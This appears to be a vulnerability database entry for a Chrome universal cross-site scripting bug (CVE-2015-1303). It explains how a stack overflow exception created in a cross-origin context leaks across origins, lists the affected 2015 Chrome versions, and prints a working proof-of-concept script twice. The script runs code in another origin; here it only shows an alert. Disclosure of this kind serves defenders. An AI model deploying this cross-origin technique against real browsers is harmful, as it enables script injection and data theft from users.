Chrome Universal XSS using stack overflow exceptions (CVE-2015-1303)

2017-04-24T00:00:00
ID SSV:93032
Type seebug
Reporter Root
Modified 2017-04-24T00:00:00

Description

VULNERABILITY DETAILS

When the maximum call stack size is exceeded, a RangeError object is created using isolate's current context. Thus, if a cross-origin context had been entered (through the V8WrapperInstantiationScope constructor, for example), a cross-origin exception will be propagated to the catch handler.

VERSION

Chrome 45.0.2454.85 (Stable) Chrome 46.0.2490.22 (Beta) Chrome 47.0.2503.0 (Dev) Chromium 47.0.2507.0 (Release build compiled today)

REPRODUCTION CASE

``` <script> var i = document.documentElement.appendChild(document.createElement('iframe'));

function g() { var w = frames[0]; function f() { try { f(); } catch(e) {} try { w.location; } catch(e) { o = e; } } f(); o.constructor.constructor('alert(location)')(); }

function c() { try { frames[0].a; } catch(e) { clearInterval(s); g(); } }

var s = setInterval(c, 1); i.src = 'https://abc.xyz'; </script> ```

                                        
                                            
                                                &lt;script&gt;
var i = document.documentElement.appendChild(document.createElement('iframe'));

function g() {
  var w = frames[0];
  function f() {
    try { f(); } catch(e) {}
    try { w.location; } catch(e) { o = e; }
  }
  f();
  o.constructor.constructor('alert(location)')();
}

function c() {
  try { frames[0].a; } catch(e) {
    clearInterval(s);
    g();
  }
}

var s = setInterval(c, 1);
i.src = 'https://abc.xyz';
&lt;/script&gt;